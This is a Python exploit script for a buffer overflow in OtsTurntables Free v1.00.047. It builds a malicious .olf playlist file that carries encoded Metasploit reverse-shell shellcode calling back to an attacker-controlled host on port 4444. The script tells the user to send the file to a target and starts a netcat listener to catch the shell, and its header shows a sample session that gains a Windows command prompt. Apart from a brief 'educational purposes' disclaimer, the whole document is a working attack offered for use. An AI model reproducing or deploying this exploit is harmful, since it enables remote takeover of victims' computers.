OtsTurntables Free v1.00.047 (.olf) Universal Buffer Overflow Exploit
Source: vfocus.net  Author: mr_me  Published: 2010-02-22

#!/usr/bin/python
#
# ###################################################################
#
# OtsTurntables Free v1.00.047 (.olf) Universal Buffer Overflow Exploit
# Date: 14-01-2010
# Author: mr_me
# Software Link: http://www.otsturntables.com/download-otsturntables-free/
# Version: 1.00.047
# Tested on:  Windows XP sp3
# Greetz: corelanc0d3r/jacky/eske/sinn3r/EdiStrosar/Rick2600/MarkoT/jnz
# bad chars: '\x00\x0a\xbd\x0d\x20'
#
#   ** For educational purposes only **
#
# ####################################################################
#
#  ~! I want to go back to the matrix !~
#
# mrme@backtrack:~$ ./0wnm3.py 4444 awsome-electro.olf
#
# [+] OtsTurntables Free v1.00.047 (olf file) BOF Exploit
# [+] Creating exploit file..
# [+] Writing 15000 bytes to awsome-electro.olf.. ph33r
# [+] Send awsome-electro.olf to your target
# [+] Waiting for a shell on port: 4444
# listening on [any] 4444 ...
# 192.168.2.19: inverse host lookup failed: Unknown server error : Connection timed out
# connect to [192.168.2.10] from (UNKNOWN) [192.168.2.19] 2624
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\OtsLabs\Lists>
#

import sys, os

def banner():
 print "|------------------------------------------------------------------|"
 print "|                         __               __                      |"
 print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
 print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |"
 print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
 print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
 print "|                                                                  |" 
 print "|-------------------------------------------------[ EIP Hunters ]--|"
 print "[+] OtsTurntables Free v1.00.047 (olf file) BOF Exploit"

if len(sys.argv) < 3:
 banner()
 print "[?] Usage: " + sys.argv[0] + " <port> <filename>"
 sys.exit(1)

port = sys.argv[1]
filename = sys.argv[2]

# windows/shell_reverse_tcp - 310 bytes
# http://www.metasploit.com
# Encoder: x86/fnstenv_mov
# LHOST=192.168.2.10, EXITFUNC=seh, LPORT=4444
 
shell = ("\x6a\x48\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x47\x4b"
"\x25\x9a\x83\xeb\xfc\xe2\xf4\xbb\x21\xce\xd7\xaf\xb2\xda\x65"
"\xb8\x2b\xae\xf6\x63\x6f\xae\xdf\x7b\xc0\x59\x9f\x3f\x4a\xca"
"\x11\x08\x53\xae\xc5\x67\x4a\xce\xd3\xcc\x7f\xae\x9b\xa9\x7a"
"\xe5\x03\xeb\xcf\xe5\xee\x40\x8a\xef\x97\x46\x89\xce\x6e\x7c"
"\x1f\x01\xb2\x32\xae\xae\xc5\x63\x4a\xce\xfc\xcc\x47\x6e\x11"
"\x18\x57\x24\x71\x44\x67\xae\x13\x2b\x6f\x39\xfb\x84\x7a\xfe"
"\xfe\xcc\x08\x15\x11\x07\x47\xae\xea\x5b\xe6\xae\xda\x4f\x15"
"\x4d\x14\x09\x45\xc9\xca\xb8\x9d\x43\xc9\x21\x23\x16\xa8\x2f"
"\x3c\x56\xa8\x18\x1f\xda\x4a\x2f\x80\xc8\x66\x7c\x1b\xda\x4c"
"\x18\xc2\xc0\xfc\xc6\xa6\x2d\x98\x12\x21\x27\x65\x97\x23\xfc"
"\x93\xb2\xe6\x72\x65\x91\x18\x76\xc9\x14\x08\x76\xd9\x14\xb4"
"\xf5\xf2\x87\xe3\x27\x90\x21\x23\x34\xc6\x21\x18\xac\x7b\xd2"
"\x23\xc9\x63\xed\x2b\x72\x65\x91\x21\x35\xcb\x12\xb4\xf5\xfc"
"\x2d\x2f\x43\xf2\x24\x26\x4f\xca\x1e\x62\xe9\x13\xa0\x21\x61"
"\x13\xa5\x7a\xe5\x69\xed\xde\xac\x67\xb9\x09\x08\x64\x05\x67"
"\xa8\xe0\x7f\xe0\x8e\x31\x2f\x39\xdb\x29\x51\xb4\x50\xb2\xb8"
"\x9d\x7e\xcd\x15\x1a\x74\xcb\x2d\x4a\x74\xcb\x12\x1a\xda\x4a"
"\x2f\xe6\xfc\x9f\x89\x18\xda\x4c\x2d\xb4\xda\xad\xb8\x9b\x4d"
"\x7d\x3e\x8d\x5c\x65\x32\x4f\xda\x4c\xb8\x3c\xd9\x65\x97\x23"
"\xd5\x10\x43\x14\x76\x65\x91\xb4\xf5\x9a");

exploit = "\x41" * 900
exploit += "\xeb\x06\x90\x90"
exploit += "\x46\x79\x23\x01" # CALL DWORD PTR SS:[ESP+2c]
exploit += "\x90" * 30
exploit += shell
exploit += "\x41" * (15000-len(exploit))

banner()
try:
 print "[+] Creating exploit file.."
 print "[+] Writing",len(exploit),"bytes to " + filename + ".. ph33r"
 print "[+] Send " + filename + " to your target"
 turntable = open(filename,'w');
 turntable.write(exploit);
 turntable.close();
 print "[+] Waiting for a shell on port: " + port
 os.system('nc -lvp ' + port)
except:
 print "[-] Error: You do not have correct permissions.."


 